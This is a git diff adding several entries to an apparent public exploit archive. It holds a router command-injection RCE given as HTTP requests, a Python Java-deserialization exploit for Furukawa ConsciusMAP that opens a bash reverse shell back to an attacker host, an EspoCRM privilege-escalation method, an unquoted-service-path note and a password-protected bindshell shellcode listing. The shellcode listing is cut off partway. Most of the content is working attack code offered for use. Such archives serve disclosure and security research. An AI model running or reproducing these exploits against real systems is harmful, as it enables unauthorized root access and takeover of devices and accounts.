diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt
new file mode 100644
index 000000000..6d6bf69e5
--- /dev/null
+++ b/exploits/hardware/webapps/48377.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
+# Date: 2020-04-23
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+------
+
+NOTE: This device configurated with root permissions. So you can run the
+command as root
+
+Here is the detail(s) of the RCE(s)
+
+1- Content of the mp.asp file
+
+<form action="/goform/mp" method="POST" name="mp">
+ <input type="text" name="command" value=""> <input
+type="submit" value="GO">
+ <input type="hidden" name="getID" value="">
+ <input type="hidden" name="getID" value="">
+</form>
+
+RCE Detail:
+-------------------------------
+
+POST /goform/mp HTTP/1.1
+Host: 192.168.2.2
+User-Agent: Mozilla/5.0 *********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+DNT: 1
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: close
+Cookie: language=1
+Upgrade-Insecure-Requests: 1
+
+command=||busybox+ls&getID=
+
+-------------------------------
+
+2- Content of the syscmd.asp
+
+<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
+border=0 width="500" cellspacing=0 cellpadding=0>
+<tr><font size=2>
+This page can be used to run target system command.</tr>
+<tr><hr size=1 noshade align=top></tr>
+<tr> <td>System Command: </td>
+ <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
+ <td> <input type="submit" value="Apply" name="apply" onClick='return
+saveClick()'></td></form>
+
+
+RCE Detail:
+-------------------------------
+
+POST /goform/formSysCmd HTTP/1.1
+Host: 192.168.2.2
+User-Agent: Mozilla/5.0 *********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 11
+DNT: 1
+Authorization: Basic YWRtaW46MTIzNA==
+Connection: close
+Cookie: language=1
+Upgrade-Insecure-Requests: 1
+
+sysCmd="command to here"
\ No newline at end of file
diff --git a/exploits/java/webapps/48380.txt b/exploits/java/webapps/48380.txt
new file mode 100644
index 000000000..6bc0a0374
--- /dev/null
+++ b/exploits/java/webapps/48380.txt
@@ -0,0 +1,338 @@
+# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
+# Date: 2020-04-24
+# Vendor Homepage: https://www.tecnoredsa.com.ar
+# Exploit Authors: LiquidWorm
+# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
+# Version: 2.8.1
+# CVE : N/A
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
+#
+#
+# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
+# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
+# Affected version: APROS Evolution | 2.8.1
+# FURUKAWA | 2.7.10
+# ConsciusMAP | 2.6.4
+# | 2.3.1
+# | 2.1.49
+# | 2.1.36
+# | 2.1.31
+# | 2.1.18
+# | 2.1.16
+# | 2.1.15
+# | 2.1.1
+# | 2.0.1174
+# | 1.8
+# | 1.4.70
+#
+# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored
+# provisioning system for FTTH networks. Complete administration of
+# your entire external FTTH network plant, including from the ONUs
+# installed in each end customer, to the wiring and junction boxes.
+# Unify all the management of your FTTH network on a single platform.
+# Unify all your data, whether from customers, your network, or the
+# external plant in one place. APROS FTTH allows you to manage your
+# entire FTTH network in a simple and globalized way with just one
+# click, without being a network expert. Includes services such as:
+# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
+# QinQ for companies, and many more. General consumption graphics and
+# per customer in real time. Captive Portal for cutting or suspension
+# of the service.
+#
+# Desc: The FTTH provisioning solution suffers from an unauthenticated
+# remote code execution vulnerability due to an unsafe deserialization
+# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
+# HTTP POST parameter. The deserialization can cause the vulnerable JSF
+# web application to execute arbitrary Java functions, malicious Java
+# bytecode, and system shell commands with root privileges.
+#
+# ===================================================================
+# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
+# [*] Setting up valid URL path
+# [*] Starting callback listener child thread
+# [*] Starting handler on port 4444
+# [*] Sending serialized object
+# [*] Connection from 172.16.0.1:48446
+# [*] You got shell!
+# tomcat7@zslab:/var/lib/tomcat7$ id
+# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
+# tomcat7@zslab:/var/lib/tomcat7$ sudo su
+# id
+# uid=0(root) gid=0(root) grupos=0(root)
+# exit
+# tomcat7@zslab:/var/lib/tomcat7$ exit
+# *** Connection closed by remote host ***
+# ===================================================================
+#
+# Tested on: Apache Tomcat/7.0.68
+# Apache Tomcat/7.0.52
+# Apache MyFaces/2.2.1
+# Apache MyFaces/2.1.17
+# Apache MyFaces/2.0.10
+# GNU/Linux 4.4.0-173
+# GNU/Linux 4.4.0-137
+# GNU/Linux 4.4.0-101
+# GNU/Linux 4.4.0-83
+# GNU/Linux 3.15.0
+# GNU/Linux 3.13.0-32
+# PrimeFaces/4.0.RC1
+# Apache-Coyote/1.1
+# ACC Library 3.1
+# Ubuntu 16.04.2
+# Ubuntu 14.04.2
+# Java/1.8.0_242
+# Java/1.8.0_181
+# Java/1.8.0_131
+# Java/1.7.0_79
+# MySQL 5.7.29
+# MySQL 5.7.18
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5565
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
+#
+# CVE ID: CVE-2020-12133
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
+#
+#
+# 24.02.2020
+#
+
+import os#############
+import sys############
+import gzip#######o###
+import zlib###########
+import socket#########
+import base64#########
+import urllib#########
+import requests#######
+import telnetlib######
+import threading######
+import subprocess#####
+
+from io import BytesIO
+from time import sleep
+from flash import blic
+
+class Optics:
+
+ def __init__(self):
+ self.callback = None#
+ self.headers = None##
+ self.payload = None##
+ self.target = None###
+ self.lport = None####
+ self.path = None#####
+ self.cmd = None######
+
+ def allears(self):
+ telnetus = telnetlib.Telnet()
+ print("[*] Starting handler on port {}".format(self.lport))
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", self.lport))
+ while True:
+ try:
+ s.settimeout(8)
+ s.listen(1)
+ conn, addr = s.accept()
+ print("[*] Connection from {}:{}".format(addr[0], addr[1]))
+ telnetus.sock = conn
+ except socket.timeout as p:
+ print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))
+ print("[+] Check your port mappings.")
+ s.close()
+ exit(0)
+ break
+
+ print("[*] You got shell!")
+
+ #
+ # UnicodeDecodeError dirty fix:
+ # /usr/lib/python3.6/telnetlib.py
+ # Change from 'ascii' to 'utf-8' (Lines: 553 and 556)
+ #
+
+ telnetus.interact()
+ conn.close()
+
+ def thricer(self):
+ print("[*] Starting callback listener child thread")
+ konac = threading.Thread(name="ZSL", target=self.allears)
+ konac.start()
+ sleep(1)
+ self.gadget()
+
+ def gadget(self):
+ self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"
+ self.cmd += self.callback
+ self.cmd += "/"
+ self.cmd += str(self.lport)
+ self.cmd += "<&1"
+
+ payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C"
+ payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03"
+ payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00"
+ payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63"
+ payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"
+ payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61"
+ payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02"
+ payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61"
+ payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74"
+ payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B"
+ payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68"
+ payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66"
+ payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E"
+ payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F"
+ payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A"
+ payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00"
+ payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61"
+ payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C"
+ payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72"
+ payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61"
+ payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65"
+ payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43"
+ payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72"
+ payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72"
+ payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72"
+ payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F"
+ payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73"
+ payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72"
+ payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E"
+ payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73"
+ payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00"
+ payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70"
+ payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C"
+ payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E"
+ payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D"
+ payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69"
+ payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72"
+ payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69"
+ payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72"
+ payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D"
+ payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66"
+ payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72"
+ payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38"
+ payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A"
+ payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C"
+ payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C"
+ payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B"
+ payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12"
+ payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73"
+ payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E"
+ payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C"
+ payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75"
+ payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C"
+ payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A"
+ payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D"
+ payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
+ payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
+ payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00"
+ payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00"
+ payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69"
+ payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
+ payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63"
+ payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00"
+ payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61"
+ payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2"
+ payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
+ payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################"
+ payload += (bytes(self.cmd, "utf-8"))############################################"
+ payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01"
+ payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61"
+ payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2"
+ payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65"
+ payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D"
+ payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00"
+ payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E"
+ payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00"
+ payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09"
+ payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00"
+ payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######"
+
+ jbits = BytesIO()
+ with gzip.GzipFile(fileobj=jbits, mode="wb") as f:
+ f.write(payload)
+ serialize = base64.b64encode(jbits.getvalue())
+ print("[*] Sending serialized object")
+
+ self.headers = {
+ "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",
+ "Content-Type" : "application/x-www-form-urlencoded",
+ "User-Agent" : "ISP-Eye/2.51",
+ "Connection" : "keep-alive"}
+
+ self.paramz={"javax.faces.ViewState" : serialize}
+ #sleep(1)
+ r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)
+
+ def par(self):
+ if len(sys.argv) != 4:
+ self.usage()
+ else:
+ self.target = sys.argv[1]
+ self.callback = sys.argv[2]
+ self.lport = int(sys.argv[3])
+ if not "http" in self.target:
+ self.target = "http://{}".format(self.target)
+
+ def check(self):
+ print("[*] Setting up valid URL path")
+ try:
+ r = requests.get(self.target)
+ app = r.text
+ if not "FURUKAWA" in app and not "APROS" in app:
+ print("[!] App not detected.")
+ exit(0)
+ if "FURUKAWA" in app:
+ self.path = "/FURUKAWA/"
+ elif "APROS" in app:
+ self.path = "/APROS/"
+ else:
+ exit(-1337)
+ except Exception as p:
+ print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
+ exit(0)
+
+ def framed(self):
+ naslov = """
+ o===--------------------------------------===o
+ | |
+ | Furukawa Electric / Tecnored |
+ | APROS Evolution | FURUKAWA | ConsciusMAP |
+ | Fiber-To-The-Home (FTTH) |
+ | |
+ | Java Deserialization Remote Code Execution |
+ | ZSL-2020-5565 |
+ | |
+ o===--------------------------------------===o
+ ||
+ ||
+ (\__/)||
+ (•ㅅ•)||
+ / づ|
+ """
+ print(naslov)
+
+ def usage(self):
+ self.framed()
+ print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>")
+ print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n")
+ exit(0)
+
+ def main(self):
+ self.par()########()
+ self.check()######()
+ self.thricer()####()
+
+if __name__ == '__main__':
+ Optics().main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt
new file mode 100644
index 000000000..af82da422
--- /dev/null
+++ b/exploits/multiple/webapps/48376.txt
@@ -0,0 +1,40 @@
+# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.espocrm.com
+# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
+# Version: v5.8.5
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+-------------
+
+Details:
+--------------------------------------------
+
+1- When we sent a request to the /api/v1/App/user, we can see user details
+---
+First Request:
+---------------------------
+GET /api/v1/App/user HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 *************************
+Authorization: Basic *************************************
+Espo-Authorization: *************************************
+Espo-Authorization-By-Token: true
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: auth-token-secret=cdc7f7*********************377;
+auth-username=user1; auth-token=3a874a********************************48
+----
+
+2- When we decode Basic Authorization and Espo-Authorization and change the
+value with another username (like admin) in the first request, we can see
+other user information and access like BOSS
+----------
+
+3- Some Examples and encode technique
+
+- BASE64:
+First type: dXNlcjE6MQ== (user1:1)
+Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
\ No newline at end of file
diff --git a/exploits/windows/local/48378.txt b/exploits/windows/local/48378.txt
new file mode 100644
index 000000000..68c3eb333
--- /dev/null
+++ b/exploits/windows/local/48378.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path
+# Date: 2020-04-24
+# Vendor Homepage: https://getpopcorntime.is
+# Exploit Authors: Uriel Yochpaz & Jonatan Schor
+# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
+# Version: 6.2.1.14 and probably prior versions
+# Tested on: Windows 10, 7
+# CVE : N/A
+
+[+] Description:
+Popcorn Time For Windows installs as a service with an unquoted
+service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+[+] POC:
+C:\Users\User>sc qc "Update service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Update service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Update service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+[+] Exploit:
+A successful attempt would require the local user to be able to insert their
+code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe)
+folders undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5b809e378..b1b0f9065 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11038,6 +11038,7 @@ id,file,description,date,author,type,platform,port
48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
+48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42611,3 +42612,6 @@ id,file,description,date,author,type,platform,port
48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php,
48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,
48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios,
+48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
+48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
+48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index f62afe4be..e6ca9e5cc 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1020,3 +1020,4 @@ id,file,description,date,author,type,platform
48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
+48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
diff --git a/shellcodes/linux/48379.c b/shellcodes/linux/48379.c
new file mode 100644
index 000000000..72e38e10d
--- /dev/null
+++ b/shellcodes/linux/48379.c
@@ -0,0 +1,194 @@
+## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-04-23
+## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1
+## SLAE/Student ID: PA-10913
+## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
+## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client.
+## Example:
+# user$ nc 127.0.0.1 4444
+# M@G1C WOrDz IZ??asd
+# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+
+; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+; rax = 0x29 ; rdi = 0x2 = AF_INET
+; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP
+xor rsi, rsi ; clear rsi
+mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP
+add al, 0x29 ; rax = 0x29 = socket syscall
+inc rsi ; rsi = 0x1 = SOCK_STREAM
+push rsi
+pop rdi ; rdi = 0x1
+inc rdi ; rdi = 0x2 = AF_INET
+syscall ; socket syscall ; RAX returns socket File-Descriptor
+
+; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
+; rax = 0x31 ; rdi = 0x3 = ipv4Socket
+; rsi = &ipSocketAddr ; rdi = 0x10
+; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
+; Address-Family| PORT| IP Address| 8 bytes of zeros
+xchg rdi, rax ; RDI = sockfd / ipv4Socket
+xor rax, rax
+add al, 0x31 ; rax = 0x31 = socket syscall
+push rdx ; 8 bytes of zeros for second half of struct
+push dx ; 4 bytes of zeros for IPADDR_ANY
+push dx ; 4 bytes of zeros for IPADDR_ANY
+push word 0x5c11 ; push 2 bytes for TCP Port 4444
+inc rdx
+inc rdx ; rdx = 0x2 ; dx = 0x0002
+push dx ; 0x2 = AF_INET
+add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr)
+mov rsi, rsp ; rsi = &ipSocketAddr
+syscall
+
+; int listen(int sockfd, int backlog);
+; rax = 0x32 = listen syscall
+; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0
+xor rax, rax
+add al, 0x32 ; listen syscall
+xor rsi, rsi ; backlog = 0x0
+syscall
+
+;accept
+; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket
+; rsi = 0x0 ; rdx = 0x0
+xor rax, rax
+push rax
+push rax
+pop rdx
+pop rsi
+add al, 0x2b ; accept syscall
+syscall ; accept returns client socket file-descriptor in RAX
+
+; dup2
+xchg rdi, rax ; RDI = sockfd / ClientSocketFD
+xor rsi, rsi
+add dl, 0x3 ; Loop Counter
+dup2Loop:
+xor rax, rax
+add al, 0x21 ; RAX = 0x21 = dup2 systemcall
+syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR
+inc rsi
+cmp rsi, rdx ; if 2-STDERR, end loop
+jne dup2Loop
+
+jmp short password
+
+failer:
+; write
+; rax = 0x1 ; rdi = fd = 0x1 STDOUT
+; rsi = &String ; rdx = sizeof(String)
+; String = "REALLY?!"
+; !?YLLAER : 213f594c4c414552
